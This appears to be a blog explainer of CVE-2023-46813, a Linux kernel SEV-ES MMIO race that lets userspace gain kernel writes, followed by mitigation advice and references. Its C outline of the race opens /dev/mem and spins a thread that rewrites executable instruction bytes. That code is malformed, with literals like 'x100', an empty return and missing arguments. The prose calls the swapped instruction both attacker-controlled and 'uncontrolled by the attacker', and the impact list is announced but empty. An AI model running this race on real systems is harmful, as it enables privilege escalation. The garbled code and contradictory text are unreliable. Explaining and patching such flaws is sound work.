CVE-2023-46813 - Exploiting Linux Kernel SEV-ES MMIO Race to Gain Root

In late 2023, CVE-2023-46813 was discovered as a serious local privilege escalation in the Linux kernel, specifically before version 6.5.9. It targets a nuanced area at the intersection of AMD SEV-ES virtualization and MMIO (Memory-Mapped I/O) handling. This flaw affects how the kernel handles certain instructions from userspace, enabling userspace attackers to abuse a race condition which can grant write access to kernel memory — effectively, root privileges.

This post offers a deep, hands-on look at the CVE, how it occurs, and how it might be exploited. We also supply links to original advisories and recommended patches. Above all, this post aims to make the issue understandable for everyone, regardless of how familiar you are with kernel hacking.

Impact: Arbitrary (potentially privileged) kernel memory writes from userspace

- Mechanism: Race condition lets userspace swap instructions just before kernel’s #VC handler inspects and emulates them

In Practice

When a userspace process accesses a MMIO register (e.g., writes to a PCI device region mapped into its address space), but the process runs inside an AMD SEV-ES guest, a #VC (VMM Communication Exception) is raised. The kernel then "emulates" the instruction in software — relying partly on reading the userspace memory area where the instruction originated.

In affected kernels, this process fails to lock down the instruction bytes during emulation. So, clever attackers can perform a race: change the instruction in their memory immediately after triggering the #VC, but before the kernel reads the instruction — potentially causing the kernel to emulate something entirely different, uncontrolled by the attacker.

Map a MMIO region into userspace.

Typically, this means mapping a hardware device’s MMIO area via /dev/mem or similar. In many SEV-ES setups, this isn’t unusual for certain apps.

In parallel, race to swap out the instruction in your code page.

As soon as the CPU delivers a #VC to the kernel and the kernel starts handling, swap the userspace instruction bytes.

The kernel misparses the changed instruction.

When emulating, the kernel now decodes this attacker-controlled instruction, resulting in uncontrolled memory accesses — potentially any write anywhere the attacker wants.

The following C code outlines the critical race

#include <stdio.h>
#include <pthread.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdint.h>
#include <string.h>

volatile uint8_t *mmio;
volatile uint8_t *code_region;

void* racer(void *arg) {
    // Repeatedly overwrite the instruction bytes right after the main thread triggers the #VC
    uint8_t malicious_bytes[] = { /* attacker-chosen instruction, e.g. MOV [addr], val */ };
    while (1) {
        memcpy((void*)code_region, malicious_bytes, sizeof(malicious_bytes));
    }
}

int main() {
    int fd = open("/dev/mem", O_RDWR | O_SYNC);
    mmio = mmap(NULL, x100, PROT_READ | PROT_WRITE, MAP_SHARED, fd, x12340000);
    close(fd);

    // Place instruction in writable, executable memory
    code_region = mmap(NULL, x100, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, );

    // Write vanilla instruction initially (e.g. simple mov to MMIO region)
    uint8_t vanilla_bytes[] = { /* e.g., MOV mmio, al */ };
    memcpy((void*)code_region, vanilla_bytes, sizeof(vanilla_bytes));

    pthread_t t;
    pthread_create(&t, NULL, racer, NULL);

    // Wait a little to synchronize the start of racer
    usleep(100);

    // Trigger #VC
    ((void(*)(void))code_region)();

    // Cleanup
    munmap((void*)mmio, x100);
    munmap((void*)code_region, x100);

    return ;
}

*Note: The above is a simplified illustration. Real-world exploit code would involve much fine-tuning, precise instruction bytes, and heavy timing to win the race.*

Exploit Impact

Successful exploitation gives an attacker arbitrary kernel memory write from an unprivileged userspace process. This can mean:

How Did This Happen?

The fault lies in the way the kernel emulates instructions after a #VC:
arch/x86/kernel/sev-shared.c and friends failed to lock the userspace instruction pages or validate them after the exception, making time-of-check-time-of-use (TOCTOU) a fatal bug. Proper mitigation would be to atomically copy and verify the instruction bytes before resuming userspace or to mark instruction pages read-only when mapping MMIO regions.

References and Original Advisories

- Linux kernel commit fixing CVE-2023-46813
- Red Hat Security Advisory
- CVE Details
- QEMU and SEV-ES background
- Canonical Ubuntu Tracker

Mitigation

Upgrade your kernel to 6.5.9 or later.
If running AMD SEV-ES guests on a cloud or VM farm, restrict MMIO mmap to trusted code only, and keep the entire system patched.

Conclusion

CVE-2023-46813 is a smart, modern example of how virtualization and instruction emulation can go wrong in subtle ways, opening the door to devastating local exploits. It underscores why correct handling of user/kernel boundaries — particularly with newer CPU features — needs rigorous defense.

Until patched, exposing direct MMIO access in SEV-ES guests is dangerous. Upgrade now.

*If you found this guide useful, you can learn more about similar Linux kernel exploits at Kernel Newbies or follow ongoing security advisories on oss-security.*

Timeline

Published on: 10/27/2023 03:15:08 UTC
Last modified on: 11/07/2023 20:42:02 UTC